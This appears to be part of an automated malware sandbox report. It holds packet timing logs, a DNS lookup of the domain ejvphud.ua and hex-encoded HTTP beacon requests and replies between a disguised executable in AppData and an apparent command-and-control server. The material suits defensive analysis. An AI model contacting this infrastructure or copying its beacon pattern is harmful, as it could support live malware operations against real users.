                                                        Dec 16, 2024 14:53:30.197659016 CET8049815147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:30.197808981 CET8049811147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:30.197953939 CET4981180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:30.198590040 CET4981580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:30.225482941 CET4981580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:30.345356941 CET8049815147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:31.620377064 CET8049815147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:31.620467901 CET4981580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:31.854120970 CET4981580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:31.854659081 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:31.974651098 CET8049815147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:31.974699020 CET8049821147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:31.974747896 CET4981580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:31.974770069 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:31.975008965 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:32.094897985 CET8049821147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:33.370970964 CET8049821147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:33.371098995 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:33.482516050 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:33.602668047 CET8049821147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:34.117160082 CET8049821147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:34.117260933 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:34.233489037 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:34.233989954 CET4982780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:34.354180098 CET8049827147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:34.354476929 CET4982780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:34.354823112 CET8049821147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:34.354893923 CET4982180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:34.408777952 CET4982780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:34.528805017 CET8049827147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:35.744419098 CET8049827147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:35.744505882 CET4982780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:35.857306957 CET4982780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:35.857410908 CET4983380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:35.977600098 CET8049833147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:35.977716923 CET8049827147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:35.977796078 CET4983380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:35.977982998 CET4982780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:35.977987051 CET4983380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:36.098114014 CET8049833147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:37.333621025 CET8049833147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:37.333697081 CET4983380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:37.471827984 CET4983380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:37.472100973 CET4983780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:37.591985941 CET8049837147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:37.592025995 CET8049833147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:37.592065096 CET4983780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:37.592091084 CET4983380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:37.608743906 CET4983780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:37.728820086 CET8049837147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:38.973234892 CET8049837147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:38.973303080 CET4983780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:39.091656923 CET4983780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:39.091978073 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:39.211755991 CET8049840147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:39.211958885 CET8049837147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:39.212030888 CET4983780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:39.212044954 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:39.212215900 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:39.331968069 CET8049840147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:40.596025944 CET8049840147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:40.596097946 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.716893911 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.717190027 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.837829113 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:40.837982893 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.838342905 CET8049840147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:40.838383913 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.838409901 CET4984080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:40.958281994 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.202605009 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.202729940 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.314868927 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.434962988 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.800298929 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:42.800414085 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.919997931 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:42.920128107 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.040384054 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:43.040479898 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.040591955 CET8049846147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:43.040669918 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.043298960 CET4984680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:43.160543919 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.551151037 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.551366091 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.670789957 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.671099901 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.791400909 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.791727066 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.791795969 CET8049852147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:44.791881084 CET4985280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.791974068 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:44.911770105 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.194381952 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.194494009 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.310650110 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.311073065 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.431998968 CET8049858147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.432040930 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:46.432115078 CET4985880192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.432176113 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.432416916 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:46.552248001 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:47.807670116 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:47.807861090 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:47.920120955 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:47.920380116 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.040304899 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:48.040477991 CET8049861147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:48.040558100 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.040592909 CET4986180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.040822983 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:48.160624981 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:49.453177929 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:49.453295946 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:49.561417103 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:49.681849957 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.052721024 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.052933931 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.169753075 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.170119047 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.290116072 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.290595055 CET8049865147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:50.290838003 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.290841103 CET4986580192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.291291952 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:50.411128044 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.727293015 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.727399111 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.841954947 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.842282057 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.962352037 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.962512016 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.962718964 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:51.962863922 CET8049870147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:51.962948084 CET4987080192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:52.082813025 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.322369099 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.322583914 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.436403990 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.436801910 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.556785107 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.556904078 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.557111025 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.557425976 CET8049876147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:53.557507992 CET4987680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:53.676980019 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:54.934684038 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:54.934870958 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.045795918 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.166157007 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.522017002 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.522259951 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.638622999 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.638987064 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.758876085 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.759083033 CET8049881147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:55.759126902 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.759140015 CET4988180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.759183884 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:55.879048109 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.107979059 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.108278036 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.218097925 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.338148117 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.706929922 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.707006931 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.827644110 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.827847958 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.947638035 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.947792053 CET8049887147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:57.947946072 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.948091984 CET4988780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:57.948272943 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:58.068047047 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.333841085 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.334095955 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.452075958 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.452379942 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.572218895 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.572385073 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.572628021 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.572993994 CET8049894147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:53:59.573081970 CET4989480192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:53:59.693269968 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:00.963429928 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:00.963510036 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.077125072 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.077548027 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.197894096 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:01.198121071 CET8049897147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:01.198127031 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.198189020 CET4989780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.198599100 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:01.318669081 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:02.553124905 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:02.553198099 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.137770891 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.138098001 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.258057117 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:03.258145094 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.258450031 CET8049901147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:03.258716106 CET4990180192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.299094915 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:03.419260025 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.619347095 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.619417906 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.737021923 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.737504005 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.857501030 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.857522964 CET8049907147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:04.857614040 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.857655048 CET4990780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.857968092 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:04.978071928 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.313155890 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.313220978 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.438663006 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.439079046 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.560059071 CET8049913147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.560110092 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:06.560121059 CET4991380192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.560189962 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.560362101 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:06.680346012 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:07.976918936 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:07.978533983 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.502345085 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.502638102 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.622750998 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:08.623028994 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.623197079 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.623270035 CET8049917147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:08.623353958 CET4991780192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:08.743459940 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.024416924 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.024480104 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.141938925 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.142369986 CET4992680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.262574911 CET8049926147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.262598991 CET8049922147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:10.262679100 CET4992280192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.262676001 CET4992680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.264815092 CET4992680192.168.2.4147.45.126.31
                                                        Dec 16, 2024 14:54:10.384881973 CET8049926147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:11.688627958 CET8049926147.45.126.31192.168.2.4
                                                        Dec 16, 2024 14:54:11.689372063 CET4992680192.168.2.4147.45.126.31
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 16, 2024 14:52:59.095768929 CET5125453192.168.2.491.211.247.248
                                                        Dec 16, 2024 14:52:59.366961002 CET535125491.211.247.248192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 16, 2024 14:52:59.095768929 CET192.168.2.491.211.247.2480x23c8Standard query (0)ejvphud.uaA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 16, 2024 14:52:59.366961002 CET91.211.247.248192.168.2.40x23c8No error (0)ejvphud.ua147.45.126.31A (IP address)IN (0x0001)false
                                                        • ejvphud.ua
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449737147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:52:59.546335936 CET317OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c443db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfb12c5e894923d HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:00.969518900 CET952INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 32 65 38 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 30 38 65 63 34 35 30 65 30 38 63 63 65 65 65 30 31 31 38 65 66 62 35 30 35 61 66 34 37 38 63 39 36 63 38 61 61 63 64 63 33 31 35 38 64 34 63 63 35 62 34 39 62 37 30 36 66 63 38 31 35 62 65 64 39 63 35 31 38 32 33 66 37 37 36 35 66 61 66 36 62 66 37 36 37 61 65 32 64 35 34 63 39 66 64 64 39 30 39 63 30 34 33 63 64 37 36 62 31 31 34 66 64 32 64 38 62 32 35 65 36 30 65 61 34 36 37 63 37 34 64 62 61 65 31 34 62 65 37 35 62 37 66 34 33 65 63 32 66 36 65 39 30 32 35 36 35 38 38 65 31 31 30 63 34 65 61 38 62 39 38 33 66 63 34 36 35 39 37 31 36 64 38 35 30 38 34 32 64 62 65 34 37 62 32 65 64 35 65 33 66 65 66 37 39 64 30 65 33 37 61 62 39 38 35 65 63 64 35 34 61 65 36 33 35 63 38 31 31 33 64 34 33 35 63 32 33 66 64 32 31 37 33 31 36 36 37 62 66 65 62 38 37 66 66 38 36 32 64 35 31 65 64 35 34 37 39 33 66 66 63 32 61 35 66 65 39 66 64 65 31 38 64 65 34 33 66 37 66 61 31 65 37 34 33 39 32 38 34 66 62 37 31 32 31 31 [TRUNCATED]
                                                        Data Ascii: 2e867b68a8a3203a77b0418f55f67708ec450e08cceee0118efb505af478c96c8aacdc3158d4cc5b49b706fc815bed9c51823f7765faf6bf767ae2d54c9fdd909c043cd76b114fd2d8b25e60ea467c74dbae14be75b7f43ec2f6e90256588e110c4ea8b983fc4659716d850842dbe47b2ed5e3fef79d0e37ab985ecd54ae635c8113d435c23fd21731667bfeb87ff862d51ed54793ffc2a5fe9fde18de43f7fa1e7439284fb71211ba36aec9dd5b663cf6a01223464ac5ccfdbaf272bbfd70fbb00a7a032bdcfc830742a05d230e80defd8bb194ed23d0dc657d1f2639d2dbc9f5dbce3d8abde3227a07fb4e70b9ba0bc785ba982ea23b3f6809816e41ee35a804c67c6b1dffcdd4279a39de824ae73810532ab22df3bdc8102ca59ab30011b4fc8d5685638526585f78f22297e4e14cedcb7130df4dcbbe9dd347473e52184c302154298afda02444ed17d754c620ba789bd90af9d0ac2317a1fbb386ced68e78cd0729c069cd37347066398fc9aec1d04af268fe80
                                                        Dec 16, 2024 14:53:04.420773029 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:04.945204020 CET220INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e67b680813008c20


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449750147.45.126.31807156C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 16, 2024 14:53:05.182233095 CET325OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
                                                        Host: ejvphud.ua
                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                        Dec 16, 2024 14:53:06.672065020 CET814INHTTP/1.1 200 OK
                                                        Server: nginx/1.20.1
                                                        Date: Mon, 16 Dec 2024 13:53:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        X-Powered-By: PHP/7.4.33
                                                        Data Raw: 32 35 65 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 66 38 66 63 66 66 35 31 65 31 38 65 39 62 64 35 35 65 61 30 34 63 61 66 38 38 32 65 65 39 65 38 36 34 64 38 30 34 63 64 38 65 34 64 61 33 36 32 39 61 36 34 66 66 63 63 61 63 36 31 38 32 32 66 37 37 36 35 61 61 38 37 66 66 37 36 37 61 39 33 33 35 65 63 39 66 62 63 64 30 61 63 36 35 64 63 63 37 39 62 35 30 65 66 64 33 37 38 33 32 63 65 35 31 30 61 36 36 36 63 65 35 34 62 33 66 64 34 66 65 39 35 62 36 31 34 31 65 65 32 36 37 39 39 36 33 62 36 64 38 64 66 66 31 31 63 30 65 34 39 34 39 64 33 33 64 33 36 39 39 35 30 38 64 63 35 31 39 31 32 62 62 30 35 65 62 39 65 38 35 66 32 31 65 64 37 30 64 61 66 66 36 37 62 62 38 66 65 64 63 62 34 62 65 30 33 66 64 37 31 37 33 31 35 38 35 30 32 34 65 33 32 35 37 32 30 33 36 30 62 31 66 32 38 66 66 64 38 33 33 33 35 35 65 30 34 32 37 61 32 35 66 34 32 66 35 64 66 37 66 37 65 36 38 61 66 38 32 30 37 65 61 31 66 33 34 36 39 31 38 34 65 35 37 38 32 37 31 [TRUNCATED]
